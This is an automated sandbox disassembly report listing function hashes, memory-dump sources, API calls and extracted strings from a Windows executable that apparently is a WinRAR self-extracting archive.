                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                      • Instruction ID: 4c9e18d8e24f53729e5d2ac2d5895dcf0a8010e18107c3b00d7b5a1004921d93
                                      • Opcode Fuzzy Hash: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                      • Instruction Fuzzy Hash: 7651E4315083D98FD702CF25C28047EBFE0AE9A714F4909AEE5D95B243C234DA4ECB66
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                      • Instruction ID: 4906548561abd251363d23ffef61ca89c57d6b48563f11a40202a0d017268e5e
                                      • Opcode Fuzzy Hash: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                      • Instruction Fuzzy Hash: 9A516DB19006198FEB24CF98E9967AEBBF4FB58314F24892AD411EB790D3749905CB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5690f047dc85c9c80d8e2fd7c2eef1b13cf1a35c6833466cce78393d23bd1ca9
                                      • Instruction ID: bf6f487791feb75b71c76ffa5da792dc93855bdaedb8946435187792ae3575d6
                                      • Opcode Fuzzy Hash: 5690f047dc85c9c80d8e2fd7c2eef1b13cf1a35c6833466cce78393d23bd1ca9
                                      • Instruction Fuzzy Hash: 1751E0B1A087119FC748CF19D48065AFBE1FF88314F058A2EE899E3341D734EA59CB96
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction ID: c5390f84f50b05a1e94b216f285fd85f003c2b18ad9055e525ec995fbfe83777
                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction Fuzzy Hash: EF31E6B1A147468FCB14DF15C85126EBFE4FB95304F10452DE589C7381C778EA1ACB92
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0050C2B1
                                      • EndDialog.USER32(?,00000006), ref: 0050C2C4
                                      • GetDlgItem.USER32(?,0000006C), ref: 0050C2E0
                                      • SetFocus.USER32(00000000), ref: 0050C2E7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0050C321
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0050C358
                                      • _swprintf.LIBCMT ref: 0050C404
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0050C417
                                      • _swprintf.LIBCMT ref: 0050C477
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0050C48A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0050C4A7
                                      • _swprintf.LIBCMT ref: 0050C535
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0050C548
                                      • _swprintf.LIBCMT ref: 0050C59C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0050C5AF
                                      Strings
                                      Memory Dump Source
                                       • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                       • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$PP$REPLACEFILEDLG
                                      • API String ID: 902387417-3764188928
                                      • Opcode ID: 6cfdd7dfed5e7f6a52580d00a35d885c43d4cc5920079db5ae69aae913b752a2
                                      • Instruction ID: 1948fbc7641eabbd82ad39b74760b75b5c767cace3dbe781feb4b6a93cd35fea
                                      • Opcode Fuzzy Hash: 6cfdd7dfed5e7f6a52580d00a35d885c43d4cc5920079db5ae69aae913b752a2
                                      • Instruction Fuzzy Hash: B491A272148349BBE3219BA0CC49FFF7BACFB9A745F004919B789C20C1D775A6089722
                                      APIs
                                      • _swprintf.LIBCMT ref: 004FE30E
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _strlen.LIBCMT ref: 004FE32F
                                      • SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                      • GetWindowRect.USER32(?,?), ref: 004FE3C9
                                      • GetClientRect.USER32(?,?), ref: 004FE3D5
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004FE475
                                      • GetWindowRect.USER32(?,?), ref: 004FE4A2
                                      • SetWindowTextW.USER32(?,?), ref: 004FE4DB
                                      • GetSystemMetrics.USER32(00000008), ref: 004FE4E3
                                      • GetWindow.USER32(?,00000005), ref: 004FE4EE
                                      • GetWindowRect.USER32(00000000,?), ref: 004FE51B
                                      • GetWindow.USER32(00000000,00000002), ref: 004FE58D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ClientItemLongMetricsSystem__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 1562912926-2512411981
                                      • Opcode ID: eeb42ab69eac7da2857dfa0d38f9c9f0c7e231536d91d7790b4803d49c4608a4
                                      • Instruction ID: b3eb1d78ea6202f8bf80de04b09882b2d3e4045baf302e479de85de36dc92b0c
                                      • Opcode Fuzzy Hash: eeb42ab69eac7da2857dfa0d38f9c9f0c7e231536d91d7790b4803d49c4608a4
                                      • Instruction Fuzzy Hash: 4D818071508305AFD710DFB9CD89A6FBBE9EB89705F04091DFA8497250D634E909CB52
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0051CB66
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C71E
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C730
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C742
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C754
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C766
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C778
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C78A
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C79C
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7AE
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7C0
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7D2
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7E4
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7F6
                                      • _free.LIBCMT ref: 0051CB5B
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051CB7D
                                      • _free.LIBCMT ref: 0051CB92
                                      • _free.LIBCMT ref: 0051CB9D
                                      • _free.LIBCMT ref: 0051CBBF
                                      • _free.LIBCMT ref: 0051CBD2
                                      • _free.LIBCMT ref: 0051CBE0
                                      • _free.LIBCMT ref: 0051CBEB
                                      • _free.LIBCMT ref: 0051CC23
                                      • _free.LIBCMT ref: 0051CC2A
                                      • _free.LIBCMT ref: 0051CC47
                                      • _free.LIBCMT ref: 0051CC5F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap___free_lconv_mon
                                      • String ID:
                                      • API String ID: 358854727-0
                                      • Opcode ID: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                      • Instruction ID: 415bbc1877f1337bff79009da02c1c0f39978b03094ec69a54261b68b17bb876
                                      • Opcode Fuzzy Hash: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                      • Instruction Fuzzy Hash: DF313C316443069FFB30AA78E84ABAA7FE9BF50314F505819E158D6191DF36ECC0CA50
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 0050D6C1
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 0050D6ED
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0050D709
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0050D720
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0050D734
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0050D75D
                                      • DeleteObject.GDI32(00000000), ref: 0050D764
                                      • GetWindow.USER32(00000000,00000002), ref: 0050D76D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 2845197485-1882779555
                                      • Opcode ID: 78a31a4efe0ab47c952b7d5b86f246e3101edceda410ba3bca2e3451aad4df38
                                      • Instruction ID: 74abc8fe6e03e0fe61b80f6c0cc64ea4f6bb2fb9c5d7342a4013405e0a555f34
                                      • Opcode Fuzzy Hash: 78a31a4efe0ab47c952b7d5b86f246e3101edceda410ba3bca2e3451aad4df38
                                      • Instruction Fuzzy Hash: 441106725407117BE7216BB09C4EFAF7E6CFF94792F004110FA45A20E2DA658F0996B5
                                      APIs
                                      • _free.LIBCMT ref: 00519705
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 00519711
                                      • _free.LIBCMT ref: 0051971C
                                      • _free.LIBCMT ref: 00519727
                                      • _free.LIBCMT ref: 00519732
                                      • _free.LIBCMT ref: 0051973D
                                      • _free.LIBCMT ref: 00519748
                                      • _free.LIBCMT ref: 00519753
                                      • _free.LIBCMT ref: 0051975E
                                      • _free.LIBCMT ref: 0051976C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                      • Instruction ID: be76eb812a4c4a640ea1b75761303fab925d4046665574d0c1c599661c90a431
                                      • Opcode Fuzzy Hash: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                      • Instruction Fuzzy Hash: 9C11D77510020AAFDB11EF54D846CED3FB5FF54350B1158A4FA084F162DF31EA909B84
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F6FAA
                                      • _wcslen.LIBCMT ref: 004F7013
                                      • _wcslen.LIBCMT ref: 004F7084
                                        • Part of subcall function 004FA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,00000000,Function_00032641,000000FF), ref: 004FA1F1
                                        • Part of subcall function 004F9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                        • Part of subcall function 004F9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,004F95D6,00000000,Function_00032641,000000FF), ref: 004F963B
                                        • Part of subcall function 004FA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,004FA325,00000001,004F70E6,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: File$_wcslen$AttributesChangeCloseDeleteFindH_prologNotificationTime
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$SE1$UNC\$\??\
                                      • API String ID: 1400313419-102587364
                                      • Opcode ID: 88a7357f26770f58012f04af4a947b12e269621dbe44e9748b1398a21b9c71d8
                                      • Instruction ID: c27e85fe17a9a8872d92bc7756d80cff64b4f45a32af7e573c1cc2db165a8300
                                      • Opcode Fuzzy Hash: 88a7357f26770f58012f04af4a947b12e269621dbe44e9748b1398a21b9c71d8
                                      • Instruction Fuzzy Hash: 3FC1D471904609AADB25DB74CC85FFFB7A8BF04304F00455AFA56E7282D73CAA48CB65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 322700389-393685449
                                      • Opcode ID: 02ff2c386828bac414164a7696d683c92e419f28417a5862e8e4d226b2eae133
                                      • Instruction ID: 3152cfaef0b4d561c7d455ccbe174640e7d3fb434ad0dcccae6549e4fb67fad8
                                      • Opcode Fuzzy Hash: 02ff2c386828bac414164a7696d683c92e419f28417a5862e8e4d226b2eae133
                                      • Instruction Fuzzy Hash: 47B17B7580020AEFEF25DFA4C8999EEBFB6FF44310F144559E8016B212D771DAA2CB91
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050B610
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050B637
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0050B650
                                      • SetWindowTextW.USER32(?,?), ref: 0050B661
                                      • GetDlgItem.USER32(?,00000065), ref: 0050B66A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0050B67E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0050B694
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: 4f9c6879c5258285c7ef7480083f7c0a5236e7fdc94a0d936f52b5ea2851ef96
                                      • Instruction ID: 054f3e7cccde48ac2b88f79432ca78d7efe41b694813568dff07cee4f05f7333
                                      • Opcode Fuzzy Hash: 4f9c6879c5258285c7ef7480083f7c0a5236e7fdc94a0d936f52b5ea2851ef96
                                      • Instruction Fuzzy Hash: C421CE32604315BBE2115B66EC8EE7F3E6CFB56B86F010014F604A61E0CB539A09A635
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: FvnP$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 176396367-114433949
                                      • Opcode ID: 89f01d1296c1db194c92e6bf599c547774f959312035d173ddfcf2a4c3585c45
                                      • Instruction ID: ccbc5d61da54f8aa80344259d7838fdc97d15cdab7414af594767f9c8a60c4cc
                                      • Opcode Fuzzy Hash: 89f01d1296c1db194c92e6bf599c547774f959312035d173ddfcf2a4c3585c45
                                      • Instruction Fuzzy Hash: 863125322087127AE725AB349C0AFAF7FACFF93310F14011DF501961D6EB649A4987A6
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: UP$pP$zP
                                      • API String ID: 176396367-1396412275
                                      • Opcode ID: f57f5c5968d80c7adfcab184c5c77b37a05e6bebe6723e455d97ae46416c82db
                                      • Instruction ID: bb9b89218c4562d047960dea5f71c01c81f7e151611195844873ff0909e280bc
                                      • Opcode Fuzzy Hash: f57f5c5968d80c7adfcab184c5c77b37a05e6bebe6723e455d97ae46416c82db
                                      • Instruction Fuzzy Hash: 8341C47190066A9BCB219FA8CC5D9EF7BB8EF41311F00001AF945F7291DB34AE498BA4
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00509EEE
                                      • GetWindowRect.USER32(?,00000000), ref: 00509F44
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00509FDB
                                      • SetWindowTextW.USER32(?,00000000), ref: 00509FE3
                                      • ShowWindow.USER32(00000000,00000005), ref: 00509FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: P$RarHtmlClassName
                                      • API String ID: 3937224194-284636800
                                      • Opcode ID: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                      • Instruction ID: 88a747a7d7859c0da60adecfcb598c49d559e8092ea09d3a2622e70dc115a6ed
                                      • Opcode Fuzzy Hash: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                      • Instruction Fuzzy Hash: F4419C31004315AFDB225F74DC5CB6BBFA8FB98742F008559F8499A096DB34D948DB61
                                      APIs
                                      • _swprintf.LIBCMT ref: 004F2536
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 3053425827-2277559157
                                      • Opcode ID: a7e69f02471f2a8cc9b89d4051e65647e9155c9d41aaf5c5acf31186d3eeeab5
                                      • Instruction ID: e12a0a48c0fcbbbb84e7755e0c8bf4549ec888e91c51b32d4b374fde693d9ccd
                                      • Opcode Fuzzy Hash: a7e69f02471f2a8cc9b89d4051e65647e9155c9d41aaf5c5acf31186d3eeeab5
                                      • Instruction Fuzzy Hash: EEF135706042889BDB14EB2486D5BBF77956F80304F08056FEE869B383CAAC9945C76A
                                      APIs
                                        • Part of subcall function 0050A699: GetDC.USER32(00000000), ref: 0050A69D
                                        • Part of subcall function 0050A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0050A6A8
                                        • Part of subcall function 0050A699: ReleaseDC.USER32(00000000,00000000), ref: 0050A6B3
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0050A83C
                                        • Part of subcall function 0050AAC9: GetDC.USER32(00000000), ref: 0050AAD2
                                        • Part of subcall function 0050AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                        • Part of subcall function 0050AAC9: ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: "P$($AP$lUR
                                      • API String ID: 1061551593-248661177
                                      • Opcode ID: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                      • Instruction ID: 6242354a3a927050da3f8d2d5f9c96fd1374d40d3b8480faded2818ee522179a
                                      • Opcode Fuzzy Hash: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                      • Instruction Fuzzy Hash: 9A91E275604355AFD720DF25C848A2BBBE8FFD9700F00491EF59AD72A0DB30A946DB62
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 3519838083-3505469590
                                      • Opcode ID: 7596a8f58c8ec2f00fbdfa04dc2187e5037bfd03747d81e926c617b9d447d442
                                      • Instruction ID: bd633dc264ff63d6f8c853e574fd0493b7e0114e85a9ce4b5d33d189d3e98c16
                                      • Opcode Fuzzy Hash: 7596a8f58c8ec2f00fbdfa04dc2187e5037bfd03747d81e926c617b9d447d442
                                      • Instruction Fuzzy Hash: 39718E74A00219EFDB14DF64DC959BFBBB9FF49310B14015EE616A72A0CB38AD06CB60
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
